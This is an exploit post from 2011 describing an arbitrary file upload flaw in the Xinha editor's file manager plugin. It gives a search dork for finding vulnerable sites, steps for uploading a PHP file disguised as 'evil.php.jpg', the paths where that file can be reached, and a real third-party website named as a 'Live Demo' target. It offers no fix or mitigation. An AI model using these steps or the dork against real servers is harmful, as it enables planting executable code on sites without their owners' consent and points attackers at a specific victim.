xinha Arbitrary File Upload Vulnerability

/\\./\\./\\./\\./\\./\\./\\./\\./\\./\\./\\./\\./\\./\\./\\./\\./\\.
\. [+] Exploit Title : xinha Arbitrary File Upload Vulnerability
\. [+] Date : 30 May 2011 at 23h10 xDD
\. [+] Author : xConsoLe`
\. [+] Category : WebApps
\. [+] d0rk : intitle:Insert Image & inurl:manager.php
\. [+] Home : http://Dzt00ls.tk   Or Http://dztools.net
\. [+] Tested on : Windows Xp SP3
/\\./\\./\\./\\./\\./\\./\\./\\./\\./\\./\\./\\./\\./\\./\\./\\./\\.


Vuln code : __________


http://localhost/xinha/plugins/ExtendedFileManager/manager.php

Upload your Evil File in *.php.jpg


You will Find it here : __________


http://localhost/xinha/plugins/ImageManager/demo_images/evil.php.jpg

Or

http://localhost/pics/evil.php.jpg


Live Demo : __________


http://www.ranchandresorttv.com/xinha/plugins/ImageManager/manager.php



[+] Greetz ; Uknownv1rus , Dfpirate , J|nX , My girl , XeN` ( Bouge toi l'cul ta un bac kwd ! ) .

[+] Made in Algeria`

[+] Une pensée pour shab el bac , GL , nchallah vous l'aures ;D

[+](c) xC `